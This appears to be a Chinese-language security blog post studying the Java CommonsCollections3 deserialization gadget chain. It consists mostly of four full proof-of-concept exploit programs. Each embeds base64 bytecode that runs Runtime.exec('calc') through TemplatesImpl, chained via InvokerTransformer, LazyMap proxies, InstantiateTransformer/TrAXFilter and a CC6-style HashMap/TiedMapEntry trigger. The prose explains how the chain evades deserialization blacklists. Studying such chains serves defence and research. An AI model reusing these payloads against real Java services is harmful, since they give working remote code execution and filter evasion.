Java反序列化CommonsCollections(三)

学习了TemplatesImpl链之后 下一步就是如何在反序列化中进行利用 TemplatesImpl中重写了defineClass 可以通过defineClass加载字节码 将TemplatesImpl链和cc1结合

package com.cc3;

import java.lang.annotation.Target;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc3Test {
  public static void main(String[] args) throws Exception {

    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAhTGNvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3Q7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACUBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgcAJgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAZABoHACcMACgAKQEABGNhbGMMACoAKwEAH2NvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABYACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAGAAEABkADQAaAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templates,"_name","dwa");
    setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(templates),
        new InvokerTransformer("newTransformer", new Class[0], new Object[0])
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> map = new HashMap<>();
    map.put("value","value");
    Map<Object,Object> transformedMap=TransformedMap.decorate(map,null,chainedTransformer);

    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class,Map.class);
    annotationInvocationdhdlConstructor.setAccessible(true);
    Object o = annotationInvocationdhdlConstructor.newInstance(Target.class,transformedMap);

    serialize(o);
    unserialize();
  }

  public static void serialize(Object o) throws Exception{
    ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    objectOutputStream.writeObject(o);
  }
  public static void unserialize() throws Exception{
    ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.bin"));
    objectInputStream.readObject();
  }
  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

这里很明显是通过cc1中的InvokerTransformer来反射调用TemplatesImpl的newTransformer方法,然后接上了TemplatesImpl链 将TemplatesImpl链和LazyMap链结合 也是一样

package com.cc3;

import java.lang.annotation.Target;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc3Test {
  public static void main(String[] args) throws Exception {

    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAhTGNvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3Q7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACUBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgcAJgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAZABoHACcMACgAKQEABGNhbGMMACoAKwEAH2NvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABYACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAGAAEABkADQAaAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templates,"_name","dwa");
    setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(templates),
        new InvokerTransformer("newTransformer", new Class[0], new Object[0])
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> map = new HashMap<>();
    Map<Object,Object> lazyMap = LazyMap.decorate(map, chainedTransformer);
    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    annotationInvocationdhdlConstructor.setAccessible(true);

    InvocationHandler h = (InvocationHandler) annotationInvocationdhdlConstructor.newInstance(Override.class, lazyMap);

    Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

    Object o = annotationInvocationdhdlConstructor.newInstance(Override.class, mapProxy);

    serialize(o);
    unserialize();
  }

  public static void serialize(Object o) throws Exception{
    ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    objectOutputStream.writeObject(o);
  }
  public static void unserialize() throws Exception{
    ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.bin"));
    objectInputStream.readObject();
  }
  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

这不是cc3

因为ysoserial的出现,诞生了一个java反序列化过滤器来阻止反序列化,里边通过黑名单与白名单的方式来限制反序列化时允许通过的类。 而cc1,LazyMap以及cc6中使用的InvokerTransformer类是被限制反序列化的,所以这条链就失效了。 ysoserial的作者找到了另外的链 就是com.sun.org.apache.xalan.internal.xsltc.trax下面的TrAXFilter类 类中的构造方法会调用newTransformer file 而TemplatesImpl链就是通过调用TemplatesImpl的newTransformer方法进行进一步达到加载字节码的目的 这里就想办法利用TrAXFilter 如何利用这个类的构造方法呢 ysoserial的作者找到了另一个类CommonsCollections中的这个InstantiateTransformer类 file 这个类中的transform方法通过反射来调用构造器。因此我们实际上不需要用到InvokerTransformer,用InstantiateTransformer就可以了 结合LazyMap链,写POC

package com.cc3;

import java.lang.annotation.Target;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc3Test {
  public static void main(String[] args) throws Exception {

    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAhTGNvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3Q7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACUBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgcAJgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAZABoHACcMACgAKQEABGNhbGMMACoAKwEAH2NvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABYACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAGAAEABkADQAaAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templates,"_name","dwa");
    setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter")),
        new InstantiateTransformer(
            new Class[]{Templates.class},
            new Object[]{templates}
        )
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> map = new HashMap<>();
    Map<Object,Object> lazyMap = LazyMap.decorate(map, chainedTransformer);
    Class c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    Constructor annotationInvocationdhdlConstructor = c.getDeclaredConstructor(Class.class, Map.class);
    annotationInvocationdhdlConstructor.setAccessible(true);

    InvocationHandler h = (InvocationHandler) annotationInvocationdhdlConstructor.newInstance(Override.class, lazyMap);

    Map mapProxy = (Map) Proxy.newProxyInstance(LazyMap.class.getClassLoader(), new Class[]{Map.class}, h);

    Object o = annotationInvocationdhdlConstructor.newInstance(Override.class, mapProxy);

    serialize(o);
    unserialize();
  }

  public static void serialize(Object o) throws Exception{
    ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    objectOutputStream.writeObject(o);
  }
  public static void unserialize() throws Exception{
    ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.bin"));
    objectInputStream.readObject();
  }
  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

结合cc6更加通用的poc

package com.cc3;

import java.lang.annotation.Target;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InstantiateTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.map.TransformedMap;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.Base64;
import java.util.HashMap;
import java.util.Map;

public class cc3Test {
  public static void main(String[] args) throws Exception {

    byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQALAoABgAeCgAfACAIACEKAB8AIgcAIwcAJAEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAhTGNvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3Q7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHACUBAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgcAJgEAClNvdXJjZUZpbGUBAA1jb2RlVGVzdC5qYXZhDAAZABoHACcMACgAKQEABGNhbGMMACoAKwEAH2NvbS9UZW1wbGFzdGVzSW1wbFRlc3QvY29kZVRlc3QBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAFAAYAAAAAAAMAAQAHAAgAAgAJAAAAPwAAAAMAAAABsQAAAAIACgAAAAYAAQAAABEACwAAACAAAwAAAAEADAANAAAAAAABAA4ADwABAAAAAQAQABEAAgASAAAABAABABMAAQAHABQAAgAJAAAASQAAAAQAAAABsQAAAAIACgAAAAYAAQAAABYACwAAACoABAAAAAEADAANAAAAAAABAA4ADwABAAAAAQAVABYAAgAAAAEAFwAYAAMAEgAAAAQAAQATAAEAGQAaAAIACQAAAEAAAgABAAAADiq3AAG4AAISA7YABFexAAAAAgAKAAAADgADAAAAGAAEABkADQAaAAsAAAAMAAEAAAAOAAwADQAAABIAAAAEAAEAGwABABwAAAACAB0=");
    TemplatesImpl templates = new TemplatesImpl();
    setFieldValue(templates,"_bytecodes",new byte[][]{bytes});
    setFieldValue(templates,"_name","dwa");
    setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());

    Transformer[] transformers = new Transformer[]{
        new ConstantTransformer(Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter")),
        new InstantiateTransformer(
            new Class[]{Templates.class},
            new Object[]{templates}
        )
    };
    ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
    HashMap<Object, Object> map = new HashMap<>();
    Map<Object,Object> lazymap = LazyMap.decorate(map, new ConstantTransformer(1));
    //第一个参数的map
    // get方法中调用的是map.get
    // 目的是调用lazyMap中的get方法 所以第一个参数是lazyMap
    TiedMapEntry tiedMapEntry = new TiedMapEntry(lazymap, "aaa");
    HashMap<Object, Object> map2 = new HashMap<>();
    //hashMap的readObject时会调用hash方法
    // 然后key.hashCode() 会调用key的hashCode方法 key的值为tiedMapEntry
    //调用tiedMapEntry的hashCode然后待用getValue方法 然后调用get方法
    map2.put(tiedMapEntry, "sss");
    lazymap.remove("aaa");
    Class c = LazyMap.class;
    Field factoryField = c.getDeclaredField("factory");
    factoryField.setAccessible(true);
    factoryField.set(lazymap,chainedTransformer);

    serialize(map2);
    unserialize();
  }

  public static void serialize(Object o) throws Exception{
    ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
    objectOutputStream.writeObject(o);
  }
  public static void unserialize() throws Exception{
    ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("ser.bin"));
    objectInputStream.readObject();
  }
  public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception{
    Field field = obj.getClass().getDeclaredField(fieldName);
    field.setAccessible(true);
    field.set(obj,value);
  }
}

Java反序列化CommonsCollections(三)
http://example.com/2021/09/20/OldBlog/java反序列化commonscollections三/
作者
Autumn
发布于
2021年9月20日
许可协议